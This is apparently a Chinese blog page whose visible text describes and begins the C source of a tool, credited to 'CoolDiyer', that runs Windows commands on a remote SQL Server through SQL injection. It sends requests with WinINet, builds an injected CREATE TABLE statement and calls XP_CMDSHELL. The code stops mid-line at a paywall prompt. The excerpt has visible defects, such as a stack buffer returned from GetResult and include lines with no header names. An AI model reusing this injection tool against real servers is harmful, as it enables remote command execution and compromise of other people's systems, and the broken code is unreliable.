这是一个C语言程序,用于通过SQL注入执行CMD命令。它利用了`Wininet`库进行HTTP请求,通过构造SQL语句在目标数据库中创建临时表,并通过`EXEC MASTER..XP_CMDSHELL`执行命令。程序会读取命令的输出,并处理特殊字符。如果无法注入,程序将输出错误信息。最后,它会删除临时表。
Poered By CoolDiyer
//由于时间问题,没加注释学过C的应该都能看懂
//
#include
#include
#include
#include
#pragma comment(lib, "wininet.lib")
char *injurl,*type,*end;
char *GetResult(char *url)
{
char buffer[1024*8];
DWORD dwBytesRead=0;
HINTERNET hNet=InternetOpen("SqlCMD",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
InternetCloseHandle(hUrlFile);
InternetCloseHandle(hNet);
return buffer;
}
char *ExecCommand(char *cmd)
{
char url[1024],buff[1024],result[1024],*response,*p,*p1;
int n=1,i,j;
memset(url,0,sizeof(url));
wsprintf(url,"%s%s;CREATE TABLE [SIC_Tmp]([id] int NOT NULL IDENTITY (1,1), [ResultTx
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
